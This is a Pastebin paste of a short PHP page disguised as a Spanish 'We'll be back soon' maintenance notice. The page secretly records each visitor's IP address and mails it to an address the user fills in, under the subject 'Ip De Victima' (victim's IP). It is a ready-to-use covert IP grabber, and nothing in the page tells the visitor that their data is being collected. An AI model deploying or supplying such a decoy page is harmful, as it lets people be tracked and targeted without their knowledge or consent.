Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <title>¡Volveremos pronto!</title>
- <?php
- $ip = $_SERVER['REMOTE_ADDR'];
- $destinatario = "AQUI TU CORREO ;D";
- $asunto = "Ip De Victima";
- $cuerpo = "ip: $ip";
- $cabecera = "MIME-Version: 1.0\r\n";
- $cabecera .= "Content-type: text/html; charset=iso-8859-1\r\n";
- $cabecera .= "From: IP <IP @jose.com>\r\n";
- mail($destinatario,$asunto,$cuerpo,$cabecera) ;
- ?>
- <center><b>¡Volveremos pronto!</b></Center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement